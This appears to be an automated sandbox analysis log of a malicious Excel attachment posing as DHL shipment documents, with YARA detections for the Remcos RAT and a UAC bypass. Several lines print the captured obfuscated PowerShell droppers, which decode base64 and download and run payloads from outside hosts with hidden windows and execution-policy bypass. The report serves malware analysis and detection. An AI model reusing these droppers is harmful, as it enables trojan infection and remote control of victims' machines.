                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00401806 NtdllDefWindowProc_W,20_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004018C0 NtdllDefWindowProc_W,20_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004016FD NtdllDefWindowProc_A,21_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004017B7 NtdllDefWindowProc_A,21_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,33_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89AA34CE7_2_000007FE89AA34CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1001719416_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1000B5C116_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B04020_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043610D20_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044731020_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044A49020_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040755A20_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043C56020_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B61020_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044D6C020_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004476F020_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B87020_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044081D20_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041495720_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004079EE20_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407AEB20_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044AA8020_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00412AA920_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404B7420_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404B0320_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044BBD820_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404BE520_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404C7620_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00415CFE20_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00416D7220_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00446D3020_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00446D8B20_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00406E8F20_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040503821_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041208C21_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004050A921_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040511A21_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043C13A21_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004051AB21_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044930021_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040D32221_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A4F021_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043A5AB21_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041363121_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044669021_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A73021_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004398D821_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004498E021_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A88621_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043DA0921_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00438D5E21_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00449ED021_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041FE8321_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00430F5421_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004050C222_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004014AB22_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040513322_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004051A422_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040124622_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040CA4622_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040523522_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004032C822_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040168922_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402F6022_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043706A33_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041400533_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E11C33_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004541D933_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004381E833_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041F18B33_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044627033_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E34B33_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004533AB33_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0042742E33_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043756633_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043E5A833_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004387F033_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043797E33_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004339D733_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044DA4933_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00427AD733_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041DBF333_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00427C4033_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00437DB333_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00435EEB33_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043DEED33_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00426E9F33_2_00426E9F
                    Source: DHL Shipment Doc's.xlsOLE indicator, VBA macros: true
                    Source: DHL Shipment Doc's.xlsStream path 'MBD0029C935/\x1Ole' : https://stylite.io/noDelzy{{.=a/*!9ILL~qW}\{D &A<dQGTov-yH$;]!,&Or$_8?3]+iXf(kqyiBHZL?}pEZLq*NKnr6VsXkkMwRALQA38o3YMWijhJ4monD16IJGMfZLa8eamhGClRFbUWUNcgSXRyDTqKygcYSVunBeDUOKGfSuiOGW43rssiTLnhZbMkpVMx1RlKjhqGP3biwczwxXiw1Lwv4bFyzt7Tg2PkF0KNJilNZbqF3yIy15d82Ke1eufbAJoe7IZ2yUQH1lIr0Rd8cFR7RGjsA2pU22Tqa2uplnbPUl8C3ParvwGCxePqF9hrM7ZPo6kyUv98whgA6tpRKW^wBR%U@
                    Source: D5230000.0.drStream path 'MBD0029C935/\x1Ole' : https://stylite.io/noDelzy{{.=a/*!9ILL~qW}\{D &A<dQGTov-yH$;]!,&Or$_8?3]+iXf(kqyiBHZL?}pEZLq*NKnr6VsXkkMwRALQA38o3YMWijhJ4monD16IJGMfZLa8eamhGClRFbUWUNcgSXRyDTqKygcYSVunBeDUOKGfSuiOGW43rssiTLnhZbMkpVMx1RlKjhqGP3biwczwxXiw1Lwv4bFyzt7Tg2PkF0KNJilNZbqF3yIy15d82Ke1eufbAJoe7IZ2yUQH1lIr0Rd8cFR7RGjsA2pU22Tqa2uplnbPUl8C3ParvwGCxePqF9hrM7ZPo6kyUv98whgA6tpRKW^wBR%U@
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
